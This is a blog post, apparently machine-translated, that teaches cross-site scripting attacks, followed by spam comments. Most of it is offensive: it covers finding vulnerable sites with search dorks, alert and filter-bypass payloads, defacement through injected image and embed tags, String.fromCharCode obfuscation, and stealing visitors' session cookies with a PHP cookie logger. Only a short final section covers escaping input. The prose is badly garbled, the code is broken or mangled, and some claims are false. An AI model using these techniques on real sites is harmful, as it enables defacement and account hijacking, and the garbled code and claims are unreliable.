Last Update

XSS Tutorial

Section 1 - Understanding XSS
"CSS", also known as "xss" (confused with Cascading Style Sheets Cross Site Scripting) is an open web applications often encountered. attacker to add malicious code xss recognizes opportunities. many types is possible xss attacks. Now here I stand on the most widely used 3 of them will.
I want to talk about the first round of attacks xss URL. This method will not remain on the page xss means. Xss in this case, just get the code and press "submit" we will try to. How we use our own benefit so that more will be mentioned.

The second attack is in the input field. Where would you add Data Add xss often. As an example, using a search engine, we find a great site. Search box "hacker", and he's started. If a page is loaded class that "hacker" found 100 results for the data displayed on the page will see. The case now or run the code? This attack is not possible to run PHP code in HTML and Javascript code to run, but it is possible. In the meantime, make sure this method will not stay on the server.

Third attack method, this method can be added with the code and the code on the site will be permanent. Running PHP and HTML code have two types that are connected. If we inject the same HTML as if we can inject PHP. This kind of attack is usually blogs and profile. Forums and the most you can add data rather than stay in the area where no data are included. HTML, PHP is very different. HTML on your computer, "download" is it in your browser and solutions (and therefore may view page source). With PHP code, which is hosted on the server script is parsed, then the data is sent back to the browser. PHP injection is extremely rare for this condition. Note: PHP code can never be injected into the HTML page.

Section 2 - Finding XSS Open

To find this open blogs, Forums, Shout boxes, comment boxes and you can start by trying search box. In fact, it is possible to give more examples here, nor mentioned.
Google can be used to more easily find Dorks. As an example, by typing inurl: "search.php? Q =" You can write. Now this is a page that can be found very common and many results can be obtained. Attack to find more go to my other plenty. Also note that most of the site's xss vulnerability and a good eye and a bit to find it in the filter to have information about how to do bypass is enough.

Chapter 3 - Basic Concepts on xss

Now the most commonly used to learn from the most common xss to get started.
The most common one <script>alert("xss")</script>.

This code "xss" without the quotation marks, easily editable tab a "popup" warning will.
Therefore, assuming that you mentioned action Remember return to the previous issue, we search.php? Q = a web site that simply can try on.
=<script> alert("xss")</script>

It probably will work, but still does not work, no problem, look at the different sites, although you can experiment with variations. (Too many people, just add HTML is not Javascript aware that they do not think)

<br> <b> <u> = xss </ u> </ b>

If the text is written in bold font and news are open if you push on relevance, and now I know that later we will explain methods you can use.

Chapter 4 - Attack Methods

Yes, now how does it work xss learned it, now we can explain some xss Deface methods. There are many methods that can be used to Deface the most effective and most common of them and I'll stand on.

IMG SRC The first one. For who do not know HTML IMG SRC, the official web site link's he used to show the tags.

<html> <body> <IMG src= "">

Link link with a picture if the current changes, record and will run better understand what I mean.
Now let's say Shout box, Comment box or you've entered your data and confirm, after entering the data that you have found any place showing. Given below have to show picture on the page then I can add a link.
<IMG Src= "">

Do not need them because the page already contains other tags.
This enables your image to appear larger and the site is clearly hacked.
Another method is the use of flash video. The following methods are the same but with a little more different is a way.

<EMBED Src= "">
Here, the flash video itself will be executed links.
Pop or routing may be used or
<script> ( "" )</script>

Chapter 5 - Cookie (Cookie)

Let cookie in logger's site. Now we obtain the file and upload a.php shaped our files are. Log.txt file to create Do not forget to chmod 777 var. Now in any attack, we can perform, a site which is open xss found. Now add the water code;

window.location = "cookie ="+<script>.
<srcipt>. location = "cookie ="+</script>.

Then if you visit the site if the user will be eaten cookie logger. The required information has been sent to the site and cookies will be stolen. The second part is a more clandestine. Add to your file, and then the user's session cookies for the forward. But if you say that such an attack or the possibility of our site, but only the data shows a time and does not hide it? Let us say that we search.php? Q = I in our hands a page, we use the code below and maybe we can get him a malicious url hex code, and people probably will base64 encode it

=<script>. location = " ="+</script> . cookie

Section 6 - Filtering Process to bypass

On most sites, there may seem hungry, but the code does not run, you better make a note of this section to solve. Used to bypass filtering process, some common methods;

') alert (' xss');
"); alert ( 'xss');

They are open on a server with this code <script>alert("xss")</script> they do the same thing. Data to confirm before you can try to Hexing or base 64 encoding. Be sure to water issues; xss's to test ( "xss") to use caution at all to do a good method is not practical because of the sites that I block letters xss know.
Other ways to bypass filtering;

<script Type = text / javascript>alert("PlanetCreator")</script>
<script>alert( "PlanetCreator")</script>;
<script>alert( PlanetCreator");</script>
<script>alert( PlanetCreator"/)<script>
There <script> var = 1; alert (var )</script>

Chapter 7 - Advanced Level xss

This section discusses the main methods which I will examine the firm that is used even more of myself I did not find any ways, I'm sure you will like."Magic Signals" is hungry and therefore use some commands I have seen many sites that make unnecessary. However, using fractions, a technique I met them ASCII's turn.

Necessary functions to convert the fractional numbers ASCII's a table containing all
Ascii Table - ASCII character codes and html, octal, hex and decimal chart conversion site can be found. What you want to print this table will help you to write it.

80 108 97 110 101 116 67 114 101 97 116 111 114

Yes, now we get string's decimal values, the things we need to know what function it into Javascript.


This code is suitable for this kind of thing, installation is easy. We give the following from my own argument.

String.fromCharCode (80 108 97 110 101 116 67 114 101 97 116 111 114)

Yes now
"String.fromCharCode (80 108 97 110 101 116 67 114 101 97 116 111 114)"
"PlanetCreator" expression JAVA (ASCII) are in the tab.

And icons for use with this warning, etc. do not need anything because it already serves as the variable itself.

alert (String.fromCharCode (80 108 97 110 101 116 67 114 101 97 116 111 114))

Now in this case "PlanetCreator" tab will show. And this method is called the magic mark is a number in the bypass cursors.
Before continuing to the next section, again using another method of variables than I would like to talk about.
Let's write something to say;

var myVar = 1
myVar longer a tab of saying here are 1.

To use our own favor xss's variables, we can write as follows;

There <script> myVar = 1; alert (myVar )</script>
Here, the variable contents of any sign (quote) without the use will be displayed.

Chapter 8 - xss safety

This section is intended for web developers. How to prepare the code you can make it I will talk about security.
If found to open script' xss URLs, you secure is very simple. Take a look at the following code to tell;
if (isset ($ _POST [ 'form'])){ echo "<html> <body>". $ _POST [' form ']. "</ body> </ html>"

Let's say that $ _POST [ 'from'] variable, and the leak was coming from any input dialog box have been exposed to xss attack. To ensure the security of the latter method is very simple;

$ charset = 'UTF-8', $ data = htmlentities ($ _POST [ 'form'], ENT_NOQUOTES, $ charset);
if (isset ($ data)) (echo "<html> <body>". $ data. "</ body> </ html>"

This line of code will be possible and all of them Share

Related Articles

12 comment:

EgaBlogSpot January 13, 2010 at 4:28 PM  

Yes when I know the langgue :-)

Anonymous,  March 5, 2013 at 7:20 AM  

Aρprecіation to my father ωho shared with me
conсеrning this weblоg, thіs weblog іѕ
genuinely amazing.

Visit my webpagе; payday loans
my website :: payday loans

Anonymous,  April 8, 2013 at 10:27 PM  

Hi there, I log on to your blogs regularly. Your writing style is
witty, keep it up!

Feel free to visit my homepage:

Anonymous,  April 18, 2013 at 12:36 AM  

Fantastic goοds from уou, man. I have understаnd
your stuff prеѵious to and you're just too wonderful. I really like what you have acquired here, really like what you are stating and the way in which you say it. You make it entertaining and you still take care of to keep it smart. I can't
wait to read far more fгοm yοu.
This is actually a wonderful web sitе.

my blog post: payday loans

Anonymous,  April 28, 2013 at 12:58 PM  

What's up, its good piece of writing on the topic of media print, we all be aware of media is a great source of information.

My blog post; Instant Payday Loans

Anonymous,  May 1, 2013 at 4:35 PM  

Superb post but I was wondering if you could write a litte more on
this topic? I'd be very grateful if you could elaborate a little bit more. Bless you!

Here is my web blog:

Anonymous,  May 7, 2013 at 5:39 AM  

Its like you read my mind! You seem to know so much about this, like you wrote
the book in it or something. I think that you can do with some pics to drive the
message home a little bit, but instead of that, this is magnificent
blog. An excellent read. I will definitely be back.

Feel free to surf to my page ... workouts to improve vertical

Anonymous,  May 15, 2013 at 10:29 AM  

Thank you for the good writeup. It in fact was a amusement
account it. Look advanced to more added agreeable from you!

By the way, how can we communicate?

My webpage: Http://Castlemurphy.Com

Anonymous,  May 17, 2013 at 11:44 AM  

Hey Thеre. Ι discovered your weblog the usе
of msn. That is аn extremely well written article.
I'll be sure to bookmark it and come back to learn more of your useful information. Thank you for the post. I'll certаinly гetuгn.

My blog ρost - Single Trip Travel Insurance

Anonymous,  May 30, 2013 at 9:13 PM  

alcoholic fatty liver disease milk thistle alcoholic
fatty liver disease milk thistle alcoholic fatty liver disease milk thistle

Also visit my blog; non alcoholic fatty liver disease treatment options based on pathogenic considerations

Anonymous,  June 7, 2013 at 3:09 PM  

Prettу nice post. I just stumbled uρon your
ωeblog and wanted to sаy that I have rеаlly enjoуeԁ surfing aгound уour blоg postѕ.
In аny case I'll be subscribing to your rss feed and I hope you write again soon!

My homepage :: reputation management

Anonymous,  June 14, 2013 at 8:57 PM  

Simply want to ѕaу yοur аrtiсle іs aѕ aѕtonishing.

The claritу in your post iѕ just cοol anԁ i could аѕsume
you are an exρert on thiѕ subject. Well with
youг pегmission let mе to grab your feed to kееp updаteԁ with forthcoming
post. Thanks a milliοn and pleaѕe keeρ up
the reωarding woгκ.

my web pagе: reputation management

Post a Comment


My Friends

Send Messange

Copyright 2009-2010 All Right Reserved

Back to TOP